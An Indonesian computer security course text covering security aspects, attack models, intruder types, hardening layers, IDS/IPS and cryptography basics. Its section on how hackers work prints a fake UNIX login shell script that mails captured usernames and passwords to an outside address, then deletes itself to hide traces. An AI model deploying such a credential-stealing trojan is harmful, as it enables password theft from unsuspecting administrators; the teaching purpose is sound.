Dalam dunia komunikasi data global dan perkembangan teknologi
informasi yangsenantiasa berubah serta cepatnya perkembangan software,
keamanan merupakan suatu isu yang sangat penting, baik itu keamanan fisik,
keamanan data maupun keamanan aplikasi.Perlu kita sadari bahwa untuk
mencapai suatu keamanan itu yaitu suatu hal yang sangat mustahil, seperti
yang ada dalam dunia nyata sekarang ini.Tidak ada satu daerah pun yang
betul-betul aman kondisinya, walau penjaga keamanan telah ditempatkan di
daerah ini , begitu juga dengan keamanan sistem komputer.Namun yang
bisa kita lakukan yaitu untuk mengurangi gangguan keamanan ini .
Sistem keamanan komputer bermanfaat menjaga suatu sistem komputer
dari pengaksesan seseorang yang tidak berhak. Sistem keamanan komputer
semakin dibutuhkan seiring dengan meningkatnya pengguna komputer saat
ini. Selain itu makin meningkatnya para pengguna yang menghubungkan
jaringan LANnya ke internet, namun tidak diimbangi dengan SDM yang dapat
menjaga keamanan data dan infomasi yang dimiliki. Sehingga keamanan data
yang ada menjadi terancam untuk diakses dari orang-orang yang tidak berhak.
Keamanan komputer menjadi penting sebab ini terkait dengan Privacy,
Integrity, Autentication, Confidentiality dan Availability. Beberapa ancaman
keamanan komputer yaitu virus, worm, trojan, spam dan lain-lain. Masing-
masingnya memiliki cara untuk mencuri data bahkan merusak sistem
komputer yang ada. Ancaman bagi keamanan sistem komputer ini tidak bisa
dihilangkan begitu saja, namun kita dapat meminimalisasi hal ini yaitu
dengan memakai software keamanan sistem antara lain antivirus,
antispam dan sebagainya.
Keamanan komputer yaitu suatu cabang teknologi yang dikenal dengan
nama keamananinformasi yang diterapkan pada komputer. Sasaran
keamanan komputer antara lain yaitu sebagai perlindungan informasi
terhadap pencurian atau korupsi, atau pemeliharaan ketersediaan,seperti
dijabarkan dalam kebijakan keamanan.
Menurut Gollmann pada tahun 1999 dalam bukunya “Computer Security”
menyatakan bahwa : Keamanan komputer yaitu berhubungan dengan
pencegahan diri dan deteksi terhadap tindakan pengganggu yang tidak
dikenali dalam system komputer.1
Menurut Howard (1997) dalam bukunya “An Analysis of Security
Incidents on The Internet” menyatakan bahwa keamanan komputer yaitu
tindakan pencegahan dari serangan pengguna komputer atau pengakses
jaringan yang tidak bertanggung jawab. Keamanan dalam sistem komputer
sangat berpengaruh terhadap beberapa faktor di bawah ini diantaranya yaitu
:
1. Social engineering
2. Security hole pada sistem operasi dan servis
3. Keamanan fisik
4. Serangan pada jaringan
5. DOS attack
6. Serangan via aplikasi berbasis web
7. Trojan, backdoor, rootkit, keylogger
8. Virus, worm
9. Anatomy of A Hack
Menurut Wicak dalam bukunya “mengamankan komputer dari Spywere:
2007” Keamanan dari data dan media serta teknik komunikasi
(Communication security). Tipe keamanan jenis ini banyak memakai
kelemahan yang ada pada perangkat lunak, baik perangkat lunak aplikasi
ataupun perangkat lunak yang diugunakan dalammengelola sebuah
database.2
Dalam keamanan sistem komputer yang perlu kita lakukan yaitu untuk
mempersulit orang lain mengganggu sistem yang kita pakai, baik
memakai komputer yang sifatnya sendiri, jaringan local maupun jaringan
global. Harus dipastikan system bisa berjalan dengan baik dan kondusif,
selain itu program aplikasinya masih bisa dipakai tanpa ada masalah.
pemicu Meningkatnya Kejahatan Komputer
3pemicu meningkatnya kejahatan komputer yaitu:
1. Meningkatnya aplikasi berbasis IT dan jaringan komputer, seperti : online
banking, e-commerce, Electronic data Interchange (EDI).
2. Desentralisasi server sehingga lebih banyak system yang harus
ditangani, sementara SDM terbatas. Seperti lemahnya keamanan ketika
terjadi pemindahan data.
3. Transisi dari single vendor ke multi vendor, seperti: ada 2 server dalam 1
vendor.
4. Meningkatnya kemampuan pemakai (user).
5. Lemahnya hukum IT yaitu kesulitan penegak hukum dan belum adanya
ketentuan yang pasti.
6. Kompleksitas sistem yang digunakan, seperti pada penginstallan aplikasi
yang tidak kompleks/tidak selesai
7. Koneksi internet yang lemah tingkat security nya.
8. Banyaknya software yang pada awalnya digunakan untuk melakukan
audit sebuah system dengan cara mencari kelemahan dan celah yang
mungkin disalahgunakan untuk melakukan scanning system orang lain.
9. Banyaknya software-software untuk melakukan penyusupan yang
tersedia di Internet dan bisa di download secara gratis.
2Cybercrime dapat didefinisikan sebagai perbuatan melanggar hukum yang
dilakukan dengan memakai fasilitas internet dengan memakai
teknologi komputer dan telekomunikasi.
1.4 Kebutuhan Keamanan Komputer
4Alasan kenapa keamanan komputer dibutuhkan :
• Information-based society, menyebabkan nilai informasi menjadi
sangat penting dan menuntut kemampuan untuk mengakses dan
menyediakan informasi secara cepat dan akurat menjadi sangat esensial
bagi sebuah organisasi,
• Infrastruktur Jaringan komputer, seperti LAN dan Internet,
memungkinkan untuk menyediakan informasi secara cepat, sekaligus
membuka potensi adanya lubang keamanan (security hole)
Ada beberapa hal pemicu keamanan komputer dibutuhkan, seperti:
1. Mengurangi resiko ancaman, hal ini biasa berlaku di institusi dan
perusahaan swasta.
2. Melindungi system dari kerentanan, kerentanan akan menjadikan system
berpotensi untuk memberikan akses yang tidak diizinkan bagi orang lain
yang tidak berhak.
3. Melindungi system dari gangguan alam seperti petir dan lain-lainnya.
1.5 Klasifikasi Keamanan Komputer
3Klasifikasi keamanan menurut John D. Howard, 1997 yaitu:
1. Keamanan yang bersifat fisik (physical security): termasuk akses
orang ke gedung, peralatan, dan media yang digunakan.
Contoh :
a. Wiretapping atau hal-hal yang ber-hubungan dengan akses ke kabel
atau komputer yang digunakan.
b. Denial of service, dilakukan misalnya dengan mematikan peralatan
atau membanjiri saluran komunikasi dengan pesan-pesan (yang
dapat berisi apa saja sebab yang diutamakan yaitu banyaknya
jumlah pesan).
c. Syn Flood Attack, dimana sistem (host) yang dituju dibanjiri oleh
permintaan sehingga dia menjadi ter-lalu sibuk dan bahkan dapat
berakibat macetnya sistem (hang).
2. Keamanan yang berhubungan dengan orang (personel), Contoh :
a. Identifikasi user (username dan password)
b. Profil resiko dari orang yang mempunyai akses (pemakai dan
pengelola).
3. 5Keamanan dari data dan media serta teknik komunikasi
(communications). yang termasuk di dalam kelas ini yaitu
kelemahan dalam software yang digunakan untuk mengelola data.
Seorang kriminal dapat memasang virus atau trojan horse sehingga
dapat mengumpulkan infor- masi (seperti password) yang semestinya
tidak berhak diakses.
4. Keamanan dalam operasi: Adanya prosedur yang digunakan untuk
mengatur dan mengelola sistem keamanan, dan juga ter-masuk
prosedur setelah serangan (post attack recovery).
1.6 Karakterisitik Penyusup
6Macam – macam karakteristik penyusup, yaitu :
a. The Curious (Si Ingin Tahu)
Tipe penyusup ini pada dasarnya tertarik menemukan jenis sistem dan
data yang digunakan.
b. The Malicious (Si Perusak)
4
Tipe penyusup ini ingin merusak system yang digunakan atau mengubah
tampilan layar yang dibuat.
c. The High-Profile Intruder (Si Profil Tinggi)
Tipe penyusup ini penyusup ini memakai system untuk mencapai
popularitas dia sendiri, semakin tinggi system keamanan yang kita buat,
semakin membuatnya penasaran. Jika dia berhasil masuk ke sistem kita
maka ini menjadi sarana baginya untuk mempromosikan diri.
d. The Competition (Si Pesaing)
penyusup ini lebih tertarik pada data yang ada dalam system yang kita
miliki, sebab dia menganggap kita memiliki sesuatu yang dapat
menguntungkannya secara finansial atau malah merugikannya
(penyusup).
1.7 Fase Seorang Hacker
Istilah bagi hacker (penyusup) :
1. Mundane
Tahu mengenai hacking tapi tidak mengetahui metode dan prosesnya.
2. lamer (script kiddies)
Mencoba script2 yang pernah di buat oleh aktivis hacking, tapi tidak
paham bagaimana cara membuatnya.
3. Wannabe
Paham sedikit metode hacking, dan sudah mulai berhasil menerobos.
4. larva (newbie)
Hacker pemula, teknik hacking mulai dikuasai dengan baik, sering
bereksperimen.
5. Wizard
Hacker yang membuat komunitas pembelajaran di antara mereka.
6. Master of the master hacker
Lebih mengarah ke penciptaan tools-tools yang powerfull yang salah
satunya dapat menunjang aktivitas hacking, namun lebih jadi tools
pemrograman system yang umum.
1.8 Aspek Keamanan Komputer
7Menurut Garfinkel [Simson Garfinkel, “PGP: Pretty Good Privacy,” O’Reilly &
Associ-ates, Inc., 1995.]
1. Privacy / Confidentiality
a. Defenisi : menjaga informasi dari orang yang tidak berhak mengakses.
1) Privacy : lebih kearah data-data yang sifatnya privat , Contoh : e-
mail seorang pemakai (user) tidak boleh dibaca oleh administrator.
2) Confidentiality : berhubungan dengan data yang diberikan ke
pihak lain untuk keperluan tertentu dan hanya diperbolehkan untuk
keperluan tertentu ini .
b. Contoh : data-data yang sifatnya pribadi (seperti nama, tempat
tanggal lahir, social security number, agama, status perkawinan,
penyakit yang pernah diderita, nomor kartu kredit, dan sebagainya)
harus dapat diproteksi dalam pemakaian dan penyebarannya.
c. Bentuk Serangan : usaha penyadapan (dengan program sniffer).
d. Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy dan
confidentiality yaitu dengan memakai teknologi kriptografi.
5
2. Integrity
a. Defenisi : informasi tidak boleh diubah tanpa seijin pemilik informasi.
b. Contoh : e-mail di intercept di tengah jalan, diubah isinya, kemudian
diteruskan ke alamat yang dituju.
c. Bentuk serangan : Adanya virus, trojan horse, atau pemakai lain yang
mengubah informasi tanpa ijin, “man in the middle attack” dimana
seseorang menempatkan diri di tengah pembicaraan dan menyamar
sebagai orang lain.
3. Authentication
a. Defenisi : metode untuk menyatakan bahwa informasi betul-betul asli,
atau orang yang mengakses atau memberikan informasi yaitu betul-
betul orang yang dimaksud.
b. Dukungan :
1. Adanya Tools membuktikan keaslian dokumen, dapat dilakukan
dengan teknologi watermarking(untuk menjaga “intellectual
property”, yaitu dengan menandai dokumen atau hasil karya
dengan “tanda tangan” pembuat ) dan digital signature.
2. Access control, yaitu berkaitan dengan pembatasan orang yang
dapat mengakses informasi. User harus memakai password,
biometric (ciri-ciri khas orang), dan sejenisnya.
4. Availability
a. Defenisi : berhubungan dengan ketersediaan informasi ketika
dibutuhkan.
b. Contoh hambatan :
1) “denial of service attack” (DoS attack), dimana server dikirimi
permintaan (biasanya palsu) yang bertubi-tubi atau permintaan
yang diluar perkiraan sehingga tidak dapat melayani permintaan
lain atau bahkan sampai down, hang, crash.
2) mailbomb, dimana seorang pemakai dikirimi e-mail bertubi-tubi
(katakan ribuan e-mail) dengan ukuran yang besar sehingga sang
pemakai tidak dapat membuka e-mailnya atau kesulitan
mengakses e-mailnya.
5. Access Control
a. Defenisi : cara pengaturan akses kepada informasi. berhubungan
dengan masalahauthentication dan juga privacy
b. Metode : memakai kombinasi userid/password atau
denganmemakai mekanisme lain.
6. Non-repudiation
a. Defenisi : Aspek iniberhubungan dengan si pengirim. Tujuannya agar
seseorangtidak dapat mengelak bahwa dialah yang mengirim
informasi ini .
b. Contoh ancaman : Penyangkalan pesanan melalui email
6
c. Solusi : Digital signature, certificate dan kriptografi
SERANGAN PADA KEAMANAN JARINGAN
2.1 Security Attack Models
Menurut W. Stallings [William Stallings, “Network and Internetwork Security,”
Prentice Hall, 1995]. Serangan (attack) terdiri dari :
1. Interruption (interupsi)
Gambar 2.1 Interruption
Interruption yaitu ancaman terhadap availability. Informasi dan data yang
merupakan sistem komputer dirusak dan dihapus sehingga jika dibutuhkan,
data atau informasi ini tidak lagi ada.8
Contoh penyerangannya :
a. DOS (serangan terhadap sebuah komputer atau server di dalam jaringan
internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh
komputer ini sampai komputer ini tidak dapat menjalankan
fungsinya dengan benar.)
b. DDOS (jenis serangan Denial of Service (DOS) yang memakai
banyak host (baik itu memakai komputer yang didedikasikan untuk
melakukan penyerangan atau komputer yang "dipaksa" menjadi zombie)
untuk menyerang satu buah host target dalam sebuah jaringan).
Interception yaitu serangan jenis ini ditujukan terhadap aspek privacy
dan authentication. Pihak yang tidak berwenang dapat mengakses informasi.
Contoh : serangan ini pencurian data pengguna kartu kredit.9
Contoh penyerangannya :
a. Wiretapping (penyadapan), (suatu kejahatan yang berupa penyadapan
saluran komunikasi khususnya jalur yang memakai kabel.)
b. Sniffing, (yaitu penyadapan terhadap lalu lintas data pada suatu
jaringan komputer.)
3. Modification (Pengubahan)
Gambar 2.4 Modification
Modification yaitu serangan jenis ini ditujukan terhadap aspek privacy,
authentication, dan integrity. Pihak yang tidak berwenang dapat mengakses
dan mengubah informasi.
Contoh penyerangannya :
a. mengubah nilai-nilai file data, mengubah program sehingga bertindak
secara berbeda, memodifikasi pesan-pesan yang ditransmisikan pada
jaringan.9
b. Mengubah pesan dari website dengan pesan yang merugikan pemilik
website.8
4. Fabrication (Pemalsuan)
Gambar 2.5 Fabrication
Fabrication yaitu seseorang yang tidak memiliki hak akses,
memasukkan suatu objek palsu ke dalam sistem yang ada. Serangan jenis ini
ditujukan terhadap aspek privacy, authentication, dan integrity.
Contoh Penyerangannya :
a. Phising Mail (memasukkan pesan-pesan palsu seperti e-mail palsu ke
dalam jaringan komputer.)3
2.2 Beberapa Kasus Keamanan Komputer
Berikut ini beberapa kasus yang berhubungan dengan ancaman terhadap
keamanan sistem informasi di Indonesia antara lain:
a. Tahun 1995
Vladimir Levin membobol bank-bank di kawasan Wallstreet, mengambil uang
sebesar $10 juta Kevin Mitnick, mencuri 20.000 nomor kartu kredit, menyalin
sistem operasi DEC secara ilegal, dan mengambil alih hubungan telepon di
New York dan California
b. Tahun 2000
Contoh kasusnya yaitu :
1. Fabian clone, menjebol situs aetna.co.id dan Jakarta mail dan membuat
directory atas namanya berisi peringatan terhadap administrator situs
ini . Situs yang diserang termasuk Bursa Efek Jakarta, BCA,
Indosatnet, dan beberapa situs besar lain yang tidak dilaporkan
2. September dan Oktober 2000, setelah membobol Bank Lippo, kembali
Fabian Clone beraksi dengan menjebol web milik Bank Bali.10
3. Wenas, membuat server sebuah ISP di singapura down
c. Tahun 2001
Polda DIY meringkus seorang carder (pembobol kartu kredit). Tersangka
diringkus di Bantul dengan barang bukti sebuah paket berisi lukisan berharga
30 juta rupiah.10
d. Dikutip dari berita elektronik www.republika.co.id,
perubahan kartu tanda penduduk (KTP) menjadi bentuk elektronik (e-KTP),
merupakan salah satu contoh sistem yang rentan dalam hal keamanannya,
mengingat data yang ada di dalamnya merupakan data rahasia, data privasi
yang perlu dilindungi. (keamanan Sistem Informasi Negara Terancam n.d.)
2.3 Memahami Hacker Bekerja
4Secara umum Hacker bekerja melalui tahapan tahapan sebagai berikut:
1. Mencari tahu sistem komputer yang menjadi sasaran
2. Penyusupan
3. Penjelajahan
4. Keluar dan menghilangkan jejak
Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :
Peserta kuliah UNIX ini memakai program kecil my_login dalam
bentuk shell script yang menyerupai layar login dan password sistem UNIX
sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN : $PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID
jika program ini dijalankan maka akan ditampilkan layar login seperti
layaknya awal pemakaian komputer pdaa sistem UNIX:
Login:
Password:
Layar login ini tidak terlihat beda dibanding layar login sesungguhnya, sistem
komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi
password dan di enter, maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
11
Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata
(seolah-olah) salah. Untuk itu ia segera mengulangi login dan password.
Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya
dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai ini mencoba login
dan mengisi password pada layar di atas, setelah itu maka otomatis data login
dan password ini akan di email ke mailto:hacker@company.com.
Sampai disini maka hacker telah mendapatkan login dan password
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini
juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak
(masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada
2 baris terakhir dari program my_login di atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses penghapusan program my_login
dan hapus pula ID dari proses. Dengan demikian hilanglah program ini
yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan
terhadap jejak proses di dalam sistem UNIX. Sukses dari program ini
sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat
dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing
agar pemilik root menjalankan program ini
2.4 Prinsip Dasar Perancangan Sistem Yang Aman
3Adapun dasar-dasar dari perancangan sistem yang aman yaitu :
a. Mencegah hilangnya data
b. Mencegah masuknya penyusup
2.5 Lapisan Keamanan
2.5.1 Lapisan Fisik :
Membatasi akses fisik ke mesin :
a. Akses masuk ke ruangan komputer
b. penguncian komputer secara hardware
c. keamanan BIOS
d. keamanan Bootloader
e. back-up data :
1) pemilihan piranti back-up
2) penjadwalan back-up
Mendeteksi gangguan fisik :
a. log file : Log pendek atau tidak lengkap, Log yang berisikan waktu
yang aneh, Log dengan permisi atau kepemilikan yang tidak tepat,
Catatan pelayanan reboot atau restart, Log yang hilang, masukan su
atau login dari tempat yang janggal
b. mengontrol akses sumber daya.
2.5.2 Keamanan local
Berkaitan dengan user dan hak-haknya :
a. Beri mereka fasilitas minimal yang diperlukan.
b. Hati-hati terhadap saat/dari mana mereka login, atau tempat
seharusnya mereka login.
c. Pastikan dan hapus rekening mereka ketika mereka tidak lagi
membutuhkan akses.
2.5.3 Keamanan Root
a. Ketika melakukan perintah yang kompleks, cobalah dalam cara yang
tidak merusak dulu, terutama perintah yang memakai globbing:
contoh, anda ingin melakukan “rm foo*.bak”, pertama coba dulu: “ls
foo*.bak” dan pastikan anda ingin menghapus file-file yang anda
pikirkan.
b. Beberapa orang merasa terbantu ketika melakukan “touch /-i” pada
sistem mereka. Hal ini akan membuat perintah-perintah seperti : “rm -
fr *” menanyakan apakah anda benar-benar ingin menghapus seluruh
file. (Shell anda menguraikan “-i” dulu, dan memberlakukannya
sebagai option -i ke rm).
c. Hanya menjadi root ketika melakukan tugas tunggal tertentu. Jika
anda berusaha mengetahui bagaimana melakukan sesuatu, kembali
ke shell pemakai normal hingga anda yakin apa yang perlu dilakukan
oleh root.
d. Jalur perintah untuk pemakai root sangat penting. Jalur perintah, atau
variabel lingkungan PATH mendefinisikan lokal yang dicari shell untuk
program. Cobalah dan batasi jalur perintah bagi pemakai root sedapat
mungkin, dan jangan pernah memakai ‘.’, yang berarti ‘direktori
saat ini’, dalam pernyataan PATH anda. Sebagai tambahan, jangan
pernah menaruh direktori yang dapat ditulis pada jalur pencarian
anda, sebab hal ini memungkinkan penyerang memodifikasi atau
menaruh file biner dalam jalur pencarian anda, yang memungkinkan
mereka menjadi root ketika anda menjalankan perintah ini .
e. Jangan pernah memakai seperangkat utilitas rlogin/rsh/rexec
(disebut utilitas r) sebagai root. Mereka menjadi sasaran banyak
serangan, dan sangat berbahaya bila dijalankan sebagai root. Jangan
membuat file .rhosts untuk root.
f. File /etc/securetty berisikan daftar terminal-terminal tempat root dapat
login. Secara baku (pada RedHat Linux) diset hanya pada konsol
virtual lokal (vty). Berhati-hatilah saat menambahkan yang lain ke file
ini. Anda seharusnya login dari jarak jauh sebagai pemakai biasa dan
kemudian ‘su’ jika anda butuh (mudah-mudahan melalui ssh atau
saluran terenkripsi lain), sehingga tidak perlu untuk login secara
langsung sebagai root.
g. Selalu perlahan dan berhati-hati ketika menjadi root. Tindakan anda
dapat mempengaruhi banyak hal. Pikir sebelum anda mengetik!
2.5.4 Keamanan File dan system file
a. Directory home user tidak boleh mengakses perintah mengubah
system seperti partisi, perubahan device dan lain-lain.
13
b. Lakukan setting limit system file.
c. Atur akses dan permission file : read, writa, execute bagi user maupun
group.
d. Selalu cek program-program yang tidak dikenal
2.5.5 Keamanan Password dan Enkripsi
a. Hati-hati terhadap bruto force attack dengan membuat password yang
baik.
b. Selalu mengenkripsi file yang dipertukarkan.
c. Lakukan pengamanan pada level tampilan, seperti screen saver.
2.5.6 Keamanan Kernel
a. selalu update kernel system operasi.
b. Ikuti review bugs dan kekurang-kekurangan pada system operasi.
2.5.7 Keamanan Jaringan
a. Waspadai paket sniffer yang sering menyadap port Ethernet.
b. Lakukan prosedur untuk mengecek integritas data
c. Verifikasi informasi DNS
d. Lindungi network file system
e. Gunakan firewall untuk barrier antara jaringan privat dengan jaringan
eksternal
Keamanan Informasi merupakan salah satu kunci yang dapat mempengaruhi
tingkat Reliability (termasuk performa dan availability) suatu jaringan. Untuk
mengatasi masalah keamanan jaringan dan komputer ada banyak pendekatan
yang dapat dilakukan. Salah satunya yaitu dengan memakai sistem
IDS (Intrution Detection System) dan IPS (Intrusion Prevention System).
2.5.8 Sistem IDS dan IPS
Seiring dengan Perkembangan Teknologi Informasi menjadikan keamanan
suatu informasi sangatlah penting terlebih lagi pada suatu jaringan yang
terkoneksi dengan internet. sebab itu telah berkembang teknologi IDS dan
IPS sebagai pembantu pengaman data pada suatu jarigan komputer. Dengan
adanya Intrusion Detection System (IDS) dan Instrusion Prevention System
(IPS), maka serangan-serangan ini lebih dapat dicegah ataupun
dihilangkan. IDS berguna untuk mendeteksi adanya serangan dari penyusup
(serangan dari dalam), sedangkan IPS berguna untuk mendeteksi serangan
dan menindaklanjutinya dengan pemblokan (filter) serangan. IDS dan IPS
secara umum dikenal sebagai IDPS (Intrusion Detection and Prevention
Systems).
IDS (Intrution Detection System) yaitu sebuah sistem yang melakukan
pengawasan terhadap lalulintas (traffic) jaringan dan pengawasan terhadap
kegiatan-kegiatan yang mencurigakan didalam sebuah sistem jaringan. Jika
ditemukan kegiatan-kegiatan yang mencurigakan berhubungan dengan
lalulintas jaringan, maka IDS akan memberikan peringatan kepada sistem atau
administrator jaringan. Dalam banyak kasus IDS juga merespon terhadap
lalulintas yang tidak normal / anomali melalui aksi pemblokiran user atau
alamat IP (Internet Protocol) yang melakukan usaha pengaksesan jaringan
ini .
IPS (Intrusion Prevention System) yaitu sebuah sistem yang
menggabungkan fungsi firewall dan fungsi IDS dengan proporsional.
Teknologi ini dapat digunakan untuk mencegah serangan yang akan masuk ke
jaringan lokal dengan memeriksa dan mencatat semua paket data serta
mengenali paket dengan sensor, disaat serangan telah teridentifikasi, IPS
akan menolak akses (block) dan mencatat (log) semua paket data yang
teridentifikasi ini . Jadi IPS bertindak sepeti layaknya firewall yang akan
melakukan allow dan block yang dikombinasikan dengan IDS yang dapat
mendeteksi paket secara detail. IPS memakai signatures dari paket untuk
mendeteksi aktivitas lalulintas di jaringan dan terminal, dimana pendeteksian
paket yang masuk dan keluar (inbound-outbound) dapat di cegah sedini
mungkin sebelum merusak atau mendapatkan akses ke dalam jaringan lokal.
Jadi early detection dan prevention menjadi penekanan pada IPS ini.
Tabel 2.1 Perbedaan IDS dan IPS
2.5.8.1 Metode Deteksi
IDPS memiliki 3 metode untuk melakukan deteksi, yaitu signature-based,
anomaly-based, dan stateful protocol analysis. Ketiga metode ini dapat
digunakan sekaligus atau sebagain aja.
1. Signatured-Based Detection
Metode ini dilakukan dengan membandingkan signature dari setiap paket
untuk mengidentifikasi kemungkinan adanya intrusi. Metode ini efektif bila
IDPS mendeteksi ancaman yang sudah di kenal, tetapi tidak efektif bila
ancamannya baru atau tidak di kenal oleh IDPS. Pengertian dikenal dalam
konteks ini yaitu sudah pernah terjadi sebelumnya.. Metode ini merupakan
metode yang paling sederhana, sebab hanya membandingkan paket data,
lalu di daftarkan memakai operasi perbandingan. Kelemahannya yaitu
metode ini tidak dapat melacak kejadian yang terjadi pada komunikasi
yang lebih kompleks.
2. Anomaly-Based Detection
Metode ini digunakan dengan membandingkan kegiatan yang sedang di
pantau dengan kegiatan yang di anggap normal untuk mendeteksi adanya
penyimpangan. Pada metode ini, IDPS memiliki profil yang mewakili perilaku
yang normal dari user, host, koneksi jaringan dan aplikasi. Profil ini
didapat dari hasil pemantauan karakteristik dari suatu kegiatan dalam selang
waktu tertentu. Kelebihan dari metode ini yaitu efektif dalam mendeteksi
ancaman yang belum dikenal, contohnya ketika jaringan diserang oleh tipe
intrusi yang baru. Sedangkan kekurangan dari metode ini yaitu dalam
beberapa kasus, akan sulit untuk mendapatkan deteksi yang akurat dalam
komunikasi yang lebih kompleks.
3. Stateful Protocol Analysis
Metode ini sebenarnya menyerupai anomaly-based, yaitu membandingkan
profil yang sudah ada dengan kegiatan yang sedang berlangsung untuk
mengidentifikasi penyimpangan. Namun, tidak seperti Anomaly-Based
Detection yang memakai profil host, Stateful Protocol Analysis
memakai profil yang lebih luas yang dapat merinci bagaimana sebuah
protokol yang istimewa dapat digunakan atau tidak. Arti “Stateful” disini yaitu
sistem di IDPS ini bisa memahami dan melacak situasi pada protokol network,
transport dan application.
Kelebihan dari metode ini yaitu dapat mengidentifikasi rangkaian perintah
yang tidak terduga seperti mengeluarkan perintah yang sama berulang –
ulang. Sedangkan kekurangannya yaitu kemungkinan terjadinya bentrokan
antara protokol yang digunakan oleh IDPS dengan protokol umum yang
digunakan oleh sistem operasi, atau dengan kata lain sulit membedakan
implementasi client dan server pada interaksi protokol.
KONSEP DASAR KRIPTOGRAFI
Kata kriptografi berasal dari bahasa Yunani, “kryptós” yang berarti
tersembunyi dan “gráphein” yang berarti tulisan. Kriptografi telah digunakan
oleh Julius Caesar sejak zaman Romawi Kuno. Teknik ini dijuluki Caesar
cipher untuk mengirim pesan secara rahasia, meskipun teknik yang
digunakannya sangat tidak memadai untuk ukuran kini. (Kriptografi 2020)
Casanova memakai pengetahuan mengenai kriptografi untuk mengelabui
Madame d’Urfe (ia mengatakan kepada Madame d’Urfe bahwa sesosok jin
memberi tahu kunci rahasia Madame d’Urfe kepadanya, padahal ia berhasil
memecahkan kunci rahasia berdasarkan pengetahuannya mengenai
kriptografi), sehingga ia mampu mengontrol kehidupan Madame d’Urfe secara
total.
3.1.2 Pengertian Kriptografi
Kriptografi yaitu ilmu mengenai teknik enkripsi dimana “naskah asli”
(plaintext) diacak memakai suatu kunci enkripsi menjadi “naskah acak
yang sulit dibaca” (ciphertext) oleh seseorang yang tidak memiliki kunci
dekripsi. Dekripsi memakai kunci dekripsi bisa mendapatkan kembali
data asli. Probabilitas mendapat kembali naskah asli oleh seseorang yang
tidak mempunyai kunci dekripsi dalam waktu yang tidak terlalu lama yaitu
sangat kecil.
Teknik enkripsi yang digunakan dalam kriptografi klasik yaitu enkripsi
simetris dimana kunci dekripsi sama dengan kunci enkripsi. Untuk public key
cryptography, diperlukan teknik enkripsi asimetris dimana kunci dekripsi tidak
sama dengan kunci enkripsi. Enkripsi, dekripsi dan pembuatan kunci untuk
teknik enkripsi asimetris memerlukan komputasi yang lebih intensif
dibandingkan enkripsi simetris, sebab enkripsi asimetris memakai
bilangan - bilangan yang sangat besar.
3.1.3 Aspek Keamanan Kriptografi
Kriptografi memiliki beberapa aspek keamanan antara lain :
a. Kerahasiaan (confidentiality), menjamin bahwa data-data ini
hanya bisa diakses oleh pihak-pihak tertentu saja. Kerahasiaan bertujuan
untuk melindungi suatu informasi dari semua pihak yang tidak berhak
atas informasi ini .
b. Otentikasi (authentication), merupakan identifikasi yang dilakukan
oleh masing – masing pihak yang saling berkomunikasi, maksudnya
beberapa pihak yang berkomunikasi harus mengidentifikasi satu sama
lainnya. Informasi yang didapat oleh suatu pihak dari pihak lain harus
diidentifikasi untuk memastikan keaslian dari informasi yang diterima.
c. Integritas (integrity), menjamin setiap pesan yang dikirim pasti sampai
pada penerimanya tanpa ada bagian dari pesan ini yang diganti,
diduplikasi, dirusak, diubah urutannya, dan ditambahkan. Integritas data
17
bertujuan untuk mencegah terjadinya pengubahan informasi oleh pihak-
pihak yang tidak berhak atas informasi ini . Untuk menjamin
integritas data ini pengguna harus mempunyai kemampuan untuk
mendeteksi terjadinya manipulasi data oleh pihak-pihak yang tidak
berkepentingan. Manipulasi data yang dimaksud di sini meliputi
penyisipan, penghapusan, maupun penggantian data.
d. Nirpenyangkalan (Nonrepudiation), mencegah pengirim maupun
penerima mengingkari bahwa mereka telah mengirimkan atau menerima
suatu pesan. Jika sebuah pesan dikirim, penerima dapat membuktikan
bahwa pesan ini memang dikirim oleh pengirim yang tertera.
Sebaliknya, jika sebuah pesan diterima, pengirim dapat membuktikan
bahwa pesannya telah diterima oleh pihak yang ditujunya.
3.2 Cryptosystem
Cryptographic system (kriptografi sistem) atau cryptosystem
(kriptosistem) yaitu suatu fasilitas untuk mengkonversikan plaintext ke
ciphertext dan sebaliknya. Dalam sistem ini, seperangkat parameter yang
menentukan transformasi pencipheran tertentu disebut suatu set kunci. Proses
enkripsi dan dekripsi diatur oleh satu atau beberapa kunci kriptografi.
3.3 Karakteristik Cryptosystem
Karakteristik Cryptosystem yang baik:
a. Keamanan sistem terletak pada kerahasiaan kunci dan bukan pada
kerahasiaan algoritma yang digunakan.
b. Cryptosystem yang baik memiliki ruang kunci (keyspace) yang besar.
c. Cryptosystem yang baik akan menghasilkan ciphertext yang terlihat
acak dalam seluruh tes statistik yang dilakukan terhadapnya.
d. Cryptosystem yang baik mampu menahan seluruh serangan yang
telah dikenal sebelumnya.
3.4 Macam – Macam Cryptosystem
1. Symmetric Cryptosystem
Dalam symmetric cryptosystem ini, kunci yang digunakan untuk proses
enkripsi dan dekripsi pada prinsipnya identik, tetapi satu buah kunci dapat pula
diturunkan dari kunci yang lainnya. Kunci-kunci ini harus dirahasiakan. Oleh
sebab itulah sistem ini sering disebut sebagai secret-key ciphersystem.
Jumlah kunci yang dibutuhkan umumnya yaitu :
n𝐶2
2
= 𝑛. (𝑛 − 1)
dengan n menyatakan banyaknya pengguna.Contoh dari sistem ini yaitu
Data Encryption Standard (DES), Blowfish, IDEA.
